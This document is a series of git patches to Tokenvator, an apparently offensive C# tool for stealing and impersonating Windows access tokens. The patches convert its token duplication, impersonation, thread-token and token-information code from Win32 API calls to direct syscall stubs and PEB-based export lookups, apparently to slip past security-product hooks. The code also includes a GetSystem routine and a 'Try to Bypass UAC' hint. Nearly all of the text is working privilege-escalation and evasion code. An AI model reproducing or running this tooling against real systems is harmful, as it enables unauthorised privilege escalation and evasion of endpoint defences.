@@ -262,29 +268,102 @@ public bool StartProcessAsUser(string newProcess)
             return true;
         }
 
-        ////////////////////////////////////////////////////////////////////////////////
-        // Impersonates the token from a specified processId
-        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Impersonates the token from a specified processId
+        /// Converted to D/Invoke Syscalls - still uses kernel32.GetCurrentThread()
+        /// </summary>
+        /// <returns></returns>
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public virtual bool ImpersonateUser()
         {
-            Winbase._SECURITY_ATTRIBUTES securityAttributes = new Winbase._SECURITY_ATTRIBUTES();
-            if (!advapi32.DuplicateTokenEx(
-                        hWorkingToken,
-                        (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED,
-                        ref securityAttributes,
-                        Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
-                        Winnt._TOKEN_TYPE.TokenPrimary,
-                        out phNewToken
-            ))
+            ////////////////////////////////////////////////////////////////////////////////
+            // Duplicate an existing token
+            // Winbase._SECURITY_ATTRIBUTES securityAttributes = new Winbase._SECURITY_ATTRIBUTES();
+            // advapi32.DuplicateTokenEx(hWorkingToken, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, ref securityAttributes, Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, Winnt._TOKEN_TYPE.TokenPrimary, out phNewToken)
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hNtDuplicateToken = Generic.GetSyscallStub("NtDuplicateToken");
+            MonkeyWorks.ntdll.NtDuplicateToken fSyscallNtDuplicateToken = (MonkeyWorks.ntdll.NtDuplicateToken)Marshal.GetDelegateForFunctionPointer(hNtDuplicateToken, typeof(MonkeyWorks.ntdll.NtDuplicateToken));
+
+            uint ntRetVal = 0;
+
+            Winnt._SECURITY_QUALITY_OF_SERVICE securityContextTrackingMode = new Winnt._SECURITY_QUALITY_OF_SERVICE()
             {
-                Misc.GetWin32Error("DuplicateTokenEx: ");
+                Length = (uint)Marshal.SizeOf(typeof(Winnt._SECURITY_QUALITY_OF_SERVICE)),
+                ImpersonationLevel = Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,//SecurityAnonymous
+                ContextTrackingMode = Winnt.SECURITY_CONTEXT_TRACKING_MODE.SECURITY_STATIC_TRACKING,
+                EffectiveOnly = Winnt.EFFECTIVE_ONLY.False
+            };
+
+            IntPtr hSecurityContextTrackingMode = Marshal.AllocHGlobal(Marshal.SizeOf(securityContextTrackingMode));
+            Marshal.StructureToPtr(securityContextTrackingMode, hSecurityContextTrackingMode, false);
+
+            Console.WriteLine("_OBJECT_ATTRIBUTES");
+            wudfwdm._OBJECT_ATTRIBUTES objectAttributes = new wudfwdm._OBJECT_ATTRIBUTES()
+            {
+                Length = (uint)Marshal.SizeOf(typeof(wudfwdm._OBJECT_ATTRIBUTES)),
+                RootDirectory = IntPtr.Zero,
+                Attributes = 0,
+                ObjectName = IntPtr.Zero,
+                SecurityDescriptor = IntPtr.Zero,
+                SecurityQualityOfService = hSecurityContextTrackingMode
+            };
+
+            GCHandle hObjectAttributes = GCHandle.Alloc(objectAttributes, GCHandleType.Pinned);
+
+            try
+            {
+                ntRetVal = fSyscallNtDuplicateToken(hWorkingToken, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, hObjectAttributes.AddrOfPinnedObject(), false, Winnt._TOKEN_TYPE.TokenImpersonation, ref phNewToken);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NtDuplicateToken Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
                 return false;
             }
+            finally
+            {
+                hObjectAttributes.Free();
+            }
+
+            if (0 != ntRetVal)
+            {
+                Misc.GetNtError("NtOpenProcessToken", ntRetVal);
+                return false;
+            }
+
             Console.WriteLine(" [+] Duplicate Token Handle: 0x{0}", phNewToken.ToString("X4"));
 
-            if (!advapi32.ImpersonateLoggedOnUser(phNewToken))
+            ////////////////////////////////////////////////////////////////////////////////
+            // Impersonate a newly duplicated token
+            // advapi32.ImpersonateLoggedOnUser(phNewToken)            
+            ////////////////////////////////////////////////////////////////////////////////
+
+            IntPtr hNtSetInformationThread = Generic.GetSyscallStub("NtSetInformationThread");
+            MonkeyWorks.ntdll.NtSetInformationThread fSyscallNtSetInformationThread = (MonkeyWorks.ntdll.NtSetInformationThread)Marshal.GetDelegateForFunctionPointer(hNtSetInformationThread, typeof(MonkeyWorks.ntdll.NtSetInformationThread));
+
+            //If I get bored I can switch this over
+            IntPtr hThread = kernel32.GetCurrentThread();
+
+            try
+            {
+               ntRetVal = fSyscallNtSetInformationThread(hThread, MonkeyWorks.ntdll._THREAD_INFORMATION_CLASS.ThreadImpersonationToken, ref phNewToken, (uint)Marshal.SizeOf(phNewToken));
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NtSetInformationThread Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+            finally
+            {
+                CloseHandle(hThread);
+            }
+
+            if (0 != ntRetVal)
             {
-                Misc.GetWin32Error("ImpersonateLoggedOnUser: ");
+                Misc.GetNtError("NtSetInformationThread", ntRetVal);
+                Console.ReadKey();
                 return false;
             }
 
@@ -292,6 +371,12 @@ out phNewToken
             return true;
         }
 
+        /// <summary>
+        /// Closes an handle
+        /// Converted to D/Invoke Syscalls
+        /// </summary>
+        /// <param name="handle"></param>
+        /// <returns></returns>
         protected bool CloseHandle(IntPtr handle)
         {
             IntPtr hNtClose = Generic.GetSyscallStub("NtClose");
@@ -305,30 +390,40 @@ protected bool CloseHandle(IntPtr handle)
             return true;
         }
 
+        /// <summary>
+        /// Default Deconstructor
+        /// </summary>
         ~AccessTokens()
         {
-
+            if (!Disposed)
+            {
+                Dispose();
+            }
         }
 
+        /// <summary>
+        /// Closes all the opened handles
+        /// Only Call D/Invoke Syscalls
+        /// </summary>
         public void Dispose()
         {
             try
             {
                 if (IntPtr.Zero != phNewToken)
                 {                    
-                    kernel32.CloseHandle(phNewToken);
+                    CloseHandle(phNewToken);
                 }
                 if (IntPtr.Zero != hExistingToken)
                 {
-                    kernel32.CloseHandle(hExistingToken);
+                    CloseHandle(hExistingToken);
                 }
                 if (IntPtr.Zero != hWorkingToken && currentProcessToken != hWorkingToken)
                 {
-                    kernel32.CloseHandle(hWorkingToken);
+                    CloseHandle(hWorkingToken);
                 }
                 if (IntPtr.Zero != hWorkingThreadToken)
                 {
-                    kernel32.CloseHandle(hWorkingThreadToken);
+                    CloseHandle(hWorkingThreadToken);
                 }
             }
             catch (Exception ex)
@@ -338,6 +433,10 @@ public void Dispose()
                     Console.WriteLine(ex.Message);
                 }
             }
+            finally
+            {
+                Disposed = true;
+            }
         }
     }
 }
diff --git a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
index c6f0b2d..3fe77ee 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
@@ -239,6 +239,7 @@ public bool GetSystem()
             {
                 if (OpenProcessToken((int)process))
                 {
+                    SetWorkingTokenToRemote();
                     Console.WriteLine(" [+] Opened {0}", process);
                     SetWorkingTokenToRemote();
                     if (ImpersonateUser())

From cce020725348333a787690b886b1ab703b9dc62d Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Wed, 25 Aug 2021 12:41:39 -0500
Subject: [PATCH 04/36] Converted OpenThreadToken to Syscalls

---
 .../Plugins/AccessTokens/AccessTokens.cs      | 89 +++++++++++++++----
 1 file changed, 74 insertions(+), 15 deletions(-)

diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index 488c376..8e0a9e4 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -223,34 +223,94 @@ public bool ListThreads(int processId)
             return true;
         }
 
-        ////////////////////////////////////////////////////////////////////////////////
-        // Opens a thread token
-        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Opens a thread token
+        /// Converted to D/Invoke Syscalls
+        /// </summary>
+        /// <param name="threadId"></param>
+        /// <param name="permissions"></param>
+        /// <returns></returns>
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public bool OpenThreadToken(uint threadId, uint permissions)
         {
-            IntPtr hThread = kernel32.OpenThread(ProcessThreadsApi.ThreadSecurityRights.THREAD_QUERY_INFORMATION, false, threadId);
+            ////////////////////////////////////////////////////////////////////////////////
+            // Open a limited handle to the thread via a syscall stub
+            // IntPtr hThread = kernel32.OpenThread(ProcessThreadsApi.ThreadSecurityRights.THREAD_QUERY_INFORMATION, false, threadId);
+            ////////////////////////////////////////////////////////////////////////////////
+
+            IntPtr hNtOpenThread = Generic.GetSyscallStub("NtOpenThread");
+            MonkeyWorks.ntdll.NtOpenThread fSyscallNtOpenThread = (MonkeyWorks.ntdll.NtOpenThread)Marshal.GetDelegateForFunctionPointer(hNtOpenThread, typeof(MonkeyWorks.ntdll.NtOpenThread));
+
+            IntPtr hThread = new IntPtr();
+            MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
+            MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID();
+            clientId.UniqueThread = new IntPtr(threadId);
+           
+            uint ntRetVal;
+            try
+            {
+                //ProcessThreadsApi.ThreadSecurityRights.THREAD_QUERY_INFORMATION
+                ntRetVal = fSyscallNtOpenThread(ref hThread, ProcessThreadsApi.ThreadSecurityRights.THREAD_QUERY_INFORMATION, ref objectAttributes, ref clientId);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NtOpenThread Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
 
-            if (IntPtr.Zero == hThread)
+            if (0 != ntRetVal)
             {
-                Misc.GetWin32Error("OpenThread");
+                Misc.GetNtError("NtOpenThread", ntRetVal);
                 return false;
             }
-            Console.WriteLine("[*] Recieved Thread Handle 0x{0}", hThread.ToString("X4"));
+            //Console.WriteLine("[*] Recieved Thread Handle 0x{0}", hThread.ToString("X4"));
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // Open a handle to the thread token
+            // bool retVal = kernel32.OpenThreadToken(hThread, permissions, false, ref hWorkingThreadToken);
+            ////////////////////////////////////////////////////////////////////////////////
 
-            bool retVal = kernel32.OpenThreadToken(hThread, permissions, false, ref hWorkingThreadToken);
+            IntPtr hNtOpenThreadToken = Generic.GetSyscallStub("NtOpenThreadToken");
+            MonkeyWorks.ntdll.NtOpenThreadToken fSyscallNtOpenThreadToken = (MonkeyWorks.ntdll.NtOpenThreadToken)Marshal.GetDelegateForFunctionPointer(hNtOpenThreadToken, typeof(MonkeyWorks.ntdll.NtOpenThreadToken));
 
-            if (!retVal || IntPtr.Zero == hWorkingThreadToken)
+            try
+            {
+                ntRetVal = fSyscallNtOpenThreadToken(hThread, permissions, false, ref hWorkingThreadToken);
+            }
+            catch (Exception ex)
             {
+                Console.WriteLine("[-] NtOpenThreadToken Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
                 return false;
             }
-            Console.WriteLine("[*] Recieved Token Handle 0x{0}", hExistingToken.ToString("X4"));
-            kernel32.CloseHandle(hThread);
+            finally
+            {
+                CloseHandle(hThread);
+            }
+
+            if (0 != ntRetVal)
+            {
+                //Skip error message if no token exists
+                if (3221225596 != ntRetVal)
+                {
+                    Console.WriteLine(" [-] Unable to Open Process Token");
+                    Misc.GetNtError("NtOpenProcessToken", ntRetVal);
+                }
+                return false;
+            }
+
+            Console.WriteLine("[*] Recieved Token Handle 0x{0}", hWorkingThreadToken.ToString("X4"));
             return true;
         }
 
-        ////////////////////////////////////////////////////////////////////////////////
-        // Creates a new process with the duplicated token
-        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Creates a new process with the duplicated token
+        /// No conversions required
+        /// </summary>
+        /// <param name="newProcess"></param>
+        /// <returns></returns>
         public bool StartProcessAsUser(string newProcess)
         {
             Create createProcess;
@@ -298,7 +358,6 @@ public virtual bool ImpersonateUser()
             IntPtr hSecurityContextTrackingMode = Marshal.AllocHGlobal(Marshal.SizeOf(securityContextTrackingMode));
             Marshal.StructureToPtr(securityContextTrackingMode, hSecurityContextTrackingMode, false);
 
-            Console.WriteLine("_OBJECT_ATTRIBUTES");
             wudfwdm._OBJECT_ATTRIBUTES objectAttributes = new wudfwdm._OBJECT_ATTRIBUTES()
             {
                 Length = (uint)Marshal.SizeOf(typeof(wudfwdm._OBJECT_ATTRIBUTES)),

From cd037b003d7e52d7c630e2626408a7ee403126ef Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Wed, 25 Aug 2021 15:41:57 -0500
Subject: [PATCH 05/36] Migrated List Threads to D/Invoke
 GetPebLdrModuleEntry/GetExportAddress

---
 .../Plugins/AccessTokens/AccessTokens.cs      | 57 +++++++++++++++----
 1 file changed, 46 insertions(+), 11 deletions(-)

diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index 8e0a9e4..161d624 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -35,6 +35,10 @@ class AccessTokens : IDisposable
 
         internal delegate bool Create(IntPtr phNewToken, string newProcess, string arguments);
 
+        /// <summary>
+        /// Default constructor
+        /// </summary>
+        /// <param name="currentProcessToken"></param>
         public AccessTokens(IntPtr currentProcessToken)
         {        
             phNewToken = new IntPtr();
@@ -182,9 +186,12 @@ public virtual bool OpenProcessToken(int processId)
             return true;
         }
 
-        ////////////////////////////////////////////////////////////////////////////////
-        // List all process threads
-        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// List all threads for a given process
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="processId"></param>
+        /// <returns></returns>
         public bool ListThreads(int processId)
         {
             if (0 == processId)
@@ -192,32 +199,60 @@ public bool ListThreads(int processId)
                 processId = Process.GetCurrentProcess().Id;
             }
 
-            IntPtr hSnapshot = kernel32.CreateToolhelp32Snapshot(TiHelp32.TH32CS_SNAPTHREAD, 0);
+            ////////////////////////////////////////////////////////////////////////////////
+            // Create a snapshot of all system threads that can be walked through
+            // IntPtr hSnapshot = kernel32.CreateToolhelp32Snapshot(TiHelp32.TH32CS_SNAPTHREAD, 0);
+            ////////////////////////////////////////////////////////////////////////////////
+
+            IntPtr hKernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
+            IntPtr hCreateToolhelp32Snapshot = Generic.GetExportAddress(hKernel32, "CreateToolhelp32Snapshot");
+            MonkeyWorks.kernel32.CreateToolhelp32Snapshot fCreateToolhelp32Snapshot = (MonkeyWorks.kernel32.CreateToolhelp32Snapshot)Marshal.GetDelegateForFunctionPointer(hCreateToolhelp32Snapshot, typeof(MonkeyWorks.kernel32.CreateToolhelp32Snapshot));
+            IntPtr hSnapshot = fCreateToolhelp32Snapshot(TiHelp32.TH32CS_SNAPTHREAD, 0);
 
             if (IntPtr.Zero == hSnapshot)
             {
                 Misc.GetWin32Error("CreateToolhelp32Snapshot");
+                CloseHandle(hKernel32);
                 return false;
             }
 
-            TiHelp32.tagTHREADENTRY32 threadyEntry32 = new TiHelp32.tagTHREADENTRY32()
+            ////////////////////////////////////////////////////////////////////////////////
+            // Iterate through the first snapshot instance
+            // kernel32.Thread32First(hSnapshot, ref threadEntry32);
+            ////////////////////////////////////////////////////////////////////////////////
+
+            TiHelp32.tagTHREADENTRY32 threadEntry32 = new TiHelp32.tagTHREADENTRY32()
             {
                 dwSize = (uint)Marshal.SizeOf(typeof(TiHelp32.tagTHREADENTRY32))
             };
 
-            if (!kernel32.Thread32First(hSnapshot, ref threadyEntry32))
+            IntPtr hThread32First = Generic.GetExportAddress(hKernel32, "Thread32First");
+            MonkeyWorks.kernel32.Thread32First fThread32First = (MonkeyWorks.kernel32.Thread32First)Marshal.GetDelegateForFunctionPointer(hThread32First, typeof(MonkeyWorks.kernel32.Thread32First));
+            if (!fThread32First(hSnapshot, ref threadEntry32))
             {
                 Misc.GetWin32Error("Thread32First");
                 return false;
             }
 
-            if (threadyEntry32.th32OwnerProcessID == processId)
-                threads.Add(threadyEntry32.th32ThreadID);
+            if (threadEntry32.th32OwnerProcessID == processId)
+            {
+                threads.Add(threadEntry32.th32ThreadID);
+            }
 
-            while (kernel32.Thread32Next(hSnapshot, ref threadyEntry32))
+            ////////////////////////////////////////////////////////////////////////////////
+            // Iterate through the remainder of the snapshot instances
+            // kernel32.Thread32First(hSnapshot, ref threadEntry32);
+            ////////////////////////////////////////////////////////////////////////////////
+
+            IntPtr hThread32Next = Generic.GetExportAddress(hKernel32, "Thread32Next");
+            MonkeyWorks.kernel32.Thread32Next fThread32Next = (MonkeyWorks.kernel32.Thread32Next)Marshal.GetDelegateForFunctionPointer(hThread32Next, typeof(MonkeyWorks.kernel32.Thread32Next));
+
+            while (fThread32Next(hSnapshot, ref threadEntry32))
             {
-                if (threadyEntry32.th32OwnerProcessID == processId)
-                    threads.Add(threadyEntry32.th32ThreadID);
+                if (threadEntry32.th32OwnerProcessID == processId)
+                {
+                    threads.Add(threadEntry32.th32ThreadID);
+                }
             }
 
             return true;

From 9ead92a0e8551aa40e8f06da0a194936c4aafd3c Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Wed, 25 Aug 2021 20:06:38 -0500
Subject: [PATCH 06/36] Converting TokenInformation to D\Invoke

GetTokenSource
GetTokenUser
GetTokenGroups
GetTokenPrivileges
GetTokenOwner
GetTokenPrimaryGroup
GetTokenDefaultDacl
+ _GetTokenInformation
---
 Tokenvator/MainLoop.Modules.cs                |   2 +-
 .../Plugins/AccessTokens/AccessTokens.cs      |   1 -
 .../Plugins/AccessTokens/TokenInformation.cs  | 404 +++++++++++-------
 3 files changed, 261 insertions(+), 146 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index 75dfde0..40b5724 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -413,7 +413,7 @@ private static void _Info(CommandLineParsing cLP, IntPtr hToken)
                     Console.WriteLine();
 
                     Winnt._TOKEN_TYPE tokenType;
-                    TokenInformation.GetElevationType(hToken, out tokenType);
+                    TokenInformation.GetTokenType(hToken, out tokenType);
                     TokenInformation.PrintElevation(hToken);
                 }
             }
diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index 161d624..b8d4669 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -7,7 +7,6 @@
 
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
-//using MonkeyWorks.Unmanaged.Libraries.DInvoke;
 
 using DInvoke.DynamicInvoke;
 
diff --git a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
index 244ea3a..79edb3b 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
@@ -1,62 +1,80 @@
 using System;
-using System.Collections.Generic;
-using System.Diagnostics;
+using System.Runtime.ExceptionServices;
 using System.Runtime.InteropServices;
+using System.Security;
 using System.Security.Principal;
 using System.Text;
 
+using DInvoke.DynamicInvoke;
+
 using Tokenvator.Resources;
 
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
-
 namespace Tokenvator.Plugins.AccessTokens
 {
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
     class TokenInformation : AccessTokens
     {
+        public bool tiDisposed = false;
+
         public Winnt._TOKEN_SOURCE tokenSource;
-        public IntPtr hTokenSource;
         public Ntifs._TOKEN_USER tokenUser;
-        public IntPtr hTokenUser;
         public Ntifs._TOKEN_GROUPS tokenGroups;
-        public IntPtr hTokenGroups;
         public Winnt._TOKEN_PRIVILEGES_ARRAY tokenPrivileges;
-        public IntPtr hTokenPrivileges;
         public Ntifs._TOKEN_OWNER tokenOwner;
-        public IntPtr hTokenOwner;
         public Winnt._TOKEN_PRIMARY_GROUP tokenPrimaryGroup;
-        public IntPtr hTokenPrimaryGroup;
         public Winnt._TOKEN_DEFAULT_DACL tokenDefaultDacl;
-        public IntPtr hTokenDefaultDacl;
         public Winnt._TOKEN_DEFAULT_DACL_ACL tokenDefaultDaclAcl;
 
         public TokenInformation(IntPtr hToken) : base(hToken)
         {
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Default destructor
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
         ~TokenInformation()
         {
-            Marshal.FreeHGlobal(hTokenSource);
-            Marshal.FreeHGlobal(hTokenUser);
-            Marshal.FreeHGlobal(hTokenGroups);
-            Marshal.FreeHGlobal(hTokenPrivileges);
-            Marshal.FreeHGlobal(hTokenOwner);
-            Marshal.FreeHGlobal(hTokenPrimaryGroup);
-            Marshal.FreeHGlobal(hTokenDefaultDacl);
+            if (!tiDisposed)
+            {
+                Dispose();
+            }
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //https://blogs.msdn.microsoft.com/cjacks/2006/10/08/how-to-determine-if-a-user-is-a-member-of-the-administrators-group-with-uac-enabled-on-windows-vista/
+        /// <summary>
+        /// IDisposable to free the allocated pointers
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        public static bool PrintElevation(IntPtr hToken)
+        public void Dispose()
+        {
+            tiDisposed = true;
+
+            base.Dispose();
+        }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Prints the elevation type of the token
+        /// No Conversions Required
+        /// https://blogs.msdn.microsoft.com/cjacks/2006/10/08/how-to-determine-if-a-user-is-a-member-of-the-administrators-group-with-uac-enabled-on-windows-vista/
+        /// </summary>
+        /// <param name="hToken"></param>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
+        public static void PrintElevation(IntPtr hToken)
         {
 
             int output = -1;
             if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenElevationType, ref output))
             {
                 Misc.GetWin32Error("TokenElevationType");
-                return false;
+                return;
             }
 
             switch ((Winnt.TOKEN_ELEVATION_TYPE)output)
@@ -65,27 +83,33 @@ public static bool PrintElevation(IntPtr hToken)
                     Console.WriteLine("[+] TokenElevationTypeDefault");
                     Console.WriteLine("[*] Token: Not Split");
                     //Console.WriteLine("ProcessIntegrity: Medium/Low");
-                    return false;
+                    break;
                 case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeFull:
                     Console.WriteLine("[+] TokenElevationTypeFull");
                     Console.WriteLine("[*] Token: Split");
                     Console.WriteLine("[+] ProcessIntegrity: High");
-                    return true;
+                    break;
                 case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeLimited:
                     Console.WriteLine("[-] TokenElevationTypeLimited");
                     Console.WriteLine("[*] Token: Split");
                     Console.WriteLine("[-] ProcessIntegrity: Medium/Low");
                     Console.WriteLine("[!] Hint: Try to Bypass UAC");
-                    return false;
+                    break;
                 default:
                     Console.WriteLine("[-] Unknown integrity {0}", output);
                     Console.WriteLine("[!] Trying anyway");
-                    return true;
+                    break;
             }
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //https://blogs.msdn.microsoft.com/cjacks/2006/10/08/how-to-determine-if-a-user-is-a-member-of-the-administrators-group-with-uac-enabled-on-windows-vista/
+        /// <summary>
+        /// Checks if the token is elevated
+        /// No Conversions Required
+        /// https://blogs.msdn.microsoft.com/cjacks/2006/10/08/how-to-determine-if-a-user-is-a-member-of-the-administrators-group-with-uac-enabled-on-windows-vista/
+        /// </summary>
+        /// <param name="hToken"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         public static bool CheckElevation(IntPtr hToken)
         {
@@ -110,9 +134,15 @@ public static bool CheckElevation(IntPtr hToken)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //https://blogs.msdn.microsoft.com/cjacks/2006/10/08/how-to-determine-if-a-user-is-a-member-of-the-administrators-group-with-uac-enabled-on-windows-vista/
+        /// <summary>
+        /// Prints the token and impersonation type of the token
+        /// No Conversions Required
+        /// </summary>
+        /// <param name="hToken"></param>
+        /// <param name="tokenType"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        public static bool GetElevationType(IntPtr hToken, out Winnt._TOKEN_TYPE tokenType)
+        public static bool GetTokenType(IntPtr hToken, out Winnt._TOKEN_TYPE tokenType)
         {
             int output = -1;
             if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenType, ref output))
@@ -161,7 +191,10 @@ public static bool GetElevationType(IntPtr hToken, out Winnt._TOKEN_TYPE tokenTy
 
         #region ThreadInformation
         ////////////////////////////////////////////////////////////////////////////////
-        // Lists the users for threads
+        /// <summary>
+        /// Lists the users for threads
+        /// No Conversions Required 
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         public void GetThreadUsers()
         {
@@ -180,7 +213,10 @@ public void GetThreadUsers()
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Lists the users for threads
+        /// <summary>
+        /// Lists the users for threads
+        /// No Conversions Required 
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         public void GetThreadPrivileges()
         {
@@ -202,20 +238,17 @@ public void GetThreadPrivileges()
 
         #region GetTokenInformation
         ////////////////////////////////////////////////////////////////////////////////
-        // Displays the users associated with a token
+        /// <summary>
+        /// Displays the source of a token (user32, advapi, system)
+        /// P/Invokes moved to _GetTokenInformation 
+        /// advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenSource, IntPtr.Zero, 0, out returnLength);
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         public void GetTokenSource()
         {
-            uint returnLength;
-            advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenSource, IntPtr.Zero, 0, out returnLength);
-            hTokenSource = Marshal.AllocHGlobal((int)returnLength);
+            IntPtr hTokenSource = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenSource);
             try
             {
-                if (!advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenSource, hTokenSource, returnLength, out returnLength))
-                {
-                    Misc.GetWin32Error("GetTokenInformation (TokenSource) - Pass 2");
-                    return;
-                }
                 tokenSource = (Winnt._TOKEN_SOURCE)Marshal.PtrToStructure(hTokenSource, typeof(Winnt._TOKEN_SOURCE));
                 if (0 == tokenSource.SourceName.Length)
                 {
@@ -224,123 +257,147 @@ public void GetTokenSource()
             }
             catch (Exception ex)
             {
-                Misc.GetWin32Error("GetTokenInformation (TokenSource) - Pass 2");
                 Console.WriteLine(ex.Message);
                 return;
             }
+            finally
+            {
+                Marshal.FreeHGlobal(hTokenSource);
+            }
 
             Console.WriteLine("[+] Source: " + new string(tokenSource.SourceName));
             return;
         }
-        
+
         ////////////////////////////////////////////////////////////////////////////////
-        // Displays the users associated with a token
+        /// <summary>
+        /// Displays the users associated with a token
+        /// P/Invokes moved to _GetTokenInformation 
+        /// advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenUser, IntPtr.Zero, 0, out returnLength);
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         public void GetTokenUser()
         {
-            uint returnLength;
-            advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenUser, IntPtr.Zero, 0, out returnLength);
-            hTokenUser = Marshal.AllocHGlobal((int)returnLength);
-            
+            IntPtr hTokenUser = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenUser);
             try
             {
-                if (!advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenUser, hTokenUser, returnLength, out returnLength))
-                {
-                    Misc.GetWin32Error("GetTokenInformation (TokenUser) - Pass 2");
-                    return;
-                }
                 tokenUser = (Ntifs._TOKEN_USER)Marshal.PtrToStructure(hTokenUser, typeof(Ntifs._TOKEN_USER));
             }
             catch (Exception ex)
             {
-                Misc.GetWin32Error("GetTokenInformation (TokenUser) - Pass 2");
                 Console.WriteLine(ex.Message);
                 return;
             }
+            finally
+            {
+                Marshal.FreeHGlobal(hTokenUser);
+            }
             
             Console.WriteLine("[+] User: ");
             string sid, account;
-            sid = account = string.Empty;
             _ReadSidAndName(tokenUser.User.Sid, out sid, out account);
             Console.WriteLine("{0,-50} {1}", sid, account);
             return;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Lists the groups associated with a token
+        /// <summary>
+        /// Displays the groups associated with a token
+        /// P/Invokes moved to _GetTokenInformation 
+        /// advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenGroups, IntPtr.Zero, 0, out returnLength);
+        /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetTokenGroups()
         {
-            uint returnLength;
